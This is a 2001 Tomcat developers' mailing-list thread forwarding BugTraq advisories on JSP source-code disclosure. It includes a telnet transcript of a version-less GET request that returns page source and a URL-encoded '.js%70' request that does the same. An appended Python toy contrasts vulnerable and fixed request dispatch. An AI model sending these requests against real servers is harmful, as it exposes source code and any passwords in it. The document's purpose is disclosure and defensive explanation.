From "Marc Saegesser" <marc.saeges...@apropos.com>
Subject RE: [Fwd: Tomcat may reveal script source code by URL trickery]
Date Wed, 04 Apr 2001 16:55:57 GMT
This is already fixed in 3.2.2.


> -----Original Message-----
> From: Craig R. McClanahan [mailto:Craig.McClanahan@eng.sun.com]
> Sent: Wednesday, April 04, 2001 11:09 AM
> To: tomcat-dev@jakarta.apache.org
> Subject: [Fwd: Tomcat may reveal script source code by URL trickery]
>
>
> Reported against Tomcat 3.2.1 on BugTraq.
>
> Craig
>
>
> Eric Daniel Mauricio wrote:
>
> > There is another way to get the source from a jsp page using Tomcat.
> >
> > If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
> > you will get the source code and not the jsp processed.
> >
> > In other words, use Apache + Tomcat if you intend to protect your source code.
> >
> > telnet maq106 8080
> > Trying 10.0.0.106...
> > Connected to maq106
> > Escape character is '^]'.
> > GET /examples/jsp/num/numguess.jsp
> > HTTP/1.0 200 OK
> > Content-Type: text/plain
> > Content-Length: 1237
> > Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
> > Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
> >
> > <!--
> >   Copyright (c) 1999 The Apache Software Foundation.  All rights
> >   reserved.
> >
> >   Number Guess Game
> >   Written by Jason Hunter, CTO, K&A Software
> >   http://www.servlets.com
> > -->
> >
> > <%@ page import = "num.NumberGuessBean" %>
> >
> > <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
> > <jsp:setProperty name="numguess" property="*"/>
> >
> > <html>
> > <head><title>Number Guess</title></head>
> > <body bgcolor="white">
> > <font size=4>
> >
> > <% if (numguess.getSuccess()) { %>
> >
> >   Congratulations!  You got it.
> >   And after just <%= numguess.getNumGuesses() %> tries.<p>
> >
> >   <% numguess.reset(); %>
> >
> >   Care to <a href="numguess.jsp">try again</a>?
> >
> > <% } else if (numguess.getNumGuesses() == 0) { %>
> >
> >   Welcome to the Number Guess game.<p>
> >
> >   I'm thinking of a number between 1 and 100.<p>
> >
> >   <form method=get>
> >   What's your guess? <input type=text name=guess>
> >   <input type=submit value="Submit">
> >   </form>
> >
> > <% } else { %>
> >
> >   Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.
> >
> >   You have made <%= numguess.getNumGuesses() %> guesses.<p>
> >
> >   I'm thinking of a number between 1 and 100.<p>
> >
> >   <form method=get>
> >   What's your guess? <input type=text name=guess>
> >   <input type=submit value="Submit">
> >   </form>
> >
> > <% } %>
> >
> > </font>
> > </body>
> > </html>
> > Connection closed by foreign host.
> >
> > [],
> >
> >    ericmau
> >
> > "Sverre H. Huseby" <shh@THATHOST.COM> escreveu:
> >
> > > Tomcat may reveal script source code by URL trickery
> > > ----------------------------------------------------
> > >
> > > Sverre H. Huseby advisory 2001-03-29
> > >
> > >
> > >
> > > Systems affected
> > > ----------------
> > >
> > > Tomcat 4.0-b1 (latest milestone) and nightly build as of 2001-03-28
> > > tested.  Other versions may be vulnerable too.  The problem is only
> > > present when using Tomcat's built-in web server, not when using Tomcat
> > > with Apache Web Server.
> > >
> > >
> > > Description
> > > -----------
> > >
> > > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> > > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> > > Technologies, may be tricked into revealing the source code of JSP
> > > scripts by using simple URL encoding.
> > >
> > >
> > > Details
> > > -------
> > >
> > > It seems that the built-in web server in Tomcat does URL decoding in
> > > an unreasonable order.  URLs like the following
> > >
> > >   http://XXX:8080/examples/jsp/num/numguess.js%70
> > >
> > > where %70 is a URL-encoded 'p', return the source code of index.jsp
> > > rather than running the script on the server side.
> > >
> > > To speculate: The JSP handler is skipped as this URL does not end in
> > > ".jsp", but the static file handler is nevertheless able to map the
> > > URL into a correct file name.
> > >
> > >
> > > Impact
> > > ------
> > >
> > > This design error makes it possible to fetch the source code of JSP
> > > scripts.  Such source code may contain database passwords and file
> > > names, and may reveal design errors or programming bugs that make it
> > > possible to further exploit the server or service.
> > >
> > >
> > >
> > > Reported by Sverre H. Huseby, shh@thathost.com
> > >
> > > --
> > > <URL:mailto:shh@thathost.com>
> > > <URL:http://shh.thathost.com/>
> > >
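The thread reports two ways to get JSP source out of Tomcat's built-in HTTP server: a request line with no HTTP version (an HTTP/0.9 "simple request", as in Eric's telnet transcript) and a URL-encoded extension (".js%70", as in Sverre's advisory). Sverre's guess is that the handler is chosen before the path is decoded. The following is an added example, not Tomcat's code and not a reproduction of the 3.2.2 fix (which the thread does not show): a toy dispatcher that models that ordering and the HTTP/0.9 bypass, beside a version that decodes once, validates, and maps every request through the same rules. The document root, file contents and the handler names are constructed for the example.

```python
"""Toy model of the two source-disclosure paths reported against Tomcat
3.2.1 / 4.0-b1. Added example; the ordering it models is the advisory's
speculation, not Tomcat's actual code."""
from urllib.parse import unquote

# Constructed document root (path -> file contents); not a real Tomcat tree.
DOCROOT = {
    "/examples/jsp/num/numguess.jsp":
        '<%@ page import = "num.NumberGuessBean" %>\n<html>...</html>\n',
    "/examples/index.html": "<html><body>static page</body></html>\n",
}


def jsp_handler(path):
    """Stand-in for the JSP engine: it would compile and run the page and
    must never echo the source. Returns (content_type, body)."""
    if path not in DOCROOT:
        return ("text/plain", "404 Not Found")
    return ("text/html", "<rendered output of %s>" % path)


def static_handler(path):
    """Stand-in for the default file servlet: returns the raw contents of
    whatever file the (decoded) path names, as text/plain like the report."""
    body = DOCROOT.get(path)
    if body is None:
        return ("text/plain", "404 Not Found")
    return ("text/plain", body)


def parse_request_line(line):
    """Split a request line into (method, raw_target, version).
    A two-token line such as 'GET /foo' is an HTTP/0.9 simple request."""
    parts = line.strip().split()
    if len(parts) == 2:
        return parts[0], parts[1], "HTTP/0.9"
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    raise ValueError("malformed request line: %r" % line)


def vulnerable_dispatch(request_line):
    """Models the behaviour the thread reports (assumed ordering, not the
    real Tomcat code): mapping on the encoded path, and HTTP/0.9 requests
    bypassing the mapper."""
    _method, raw, version = parse_request_line(request_line)
    if version == "HTTP/0.9":
        # Flaw 1: simple requests never reach the servlet mapper and are
        # handed straight to the file handler.
        return static_handler(unquote(raw))
    # Flaw 2: the handler is chosen on the still-encoded path, so
    # 'numguess.js%70' does not end in '.jsp' and falls through to the
    # file handler, which decodes it and finds numguess.jsp on disk.
    if raw.endswith(".jsp"):
        return jsp_handler(unquote(raw))
    return static_handler(unquote(raw))


def fixed_dispatch(request_line):
    """Decode once, validate, then map every request (HTTP/0.9 included)
    through the same suffix rules."""
    _method, raw, version = parse_request_line(request_line)
    path = unquote(raw)
    # A '%' surviving one round of decoding means double encoding; a
    # backslash or '..' segment that only appears after decoding must not
    # be allowed to change the mapping decision either.
    if "%" in path or "\\" in path or "/../" in path + "/":
        return ("text/plain", "400 Bad Request")
    if path.endswith(".jsp"):
        return jsp_handler(path)
    return static_handler(path)


def leaks_source(response):
    """True if the response body is JSP source rather than rendered output."""
    content_type, body = response
    return content_type == "text/plain" and "<%@" in body


if __name__ == "__main__":
    for line in ("GET /examples/jsp/num/numguess.jsp",
                 "GET /examples/jsp/num/numguess.js%70 HTTP/1.0",
                 "GET /examples/jsp/num/numguess.jsp HTTP/1.0"):
        print("%-50s vulnerable leaks=%s fixed leaks=%s" % (
            line, leaks_source(vulnerable_dispatch(line)),
            leaks_source(fixed_dispatch(line))))
```

The point of the fixed version is that the mapping decision and the filesystem lookup see the same string: decode exactly once, refuse anything that still looks encoded or traverses, and only then compare the suffix. Fronting Tomcat with Apache, as both posters suggest, works for the same reason: Apache decodes and normalises the path before mod_jk ever forwards it.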

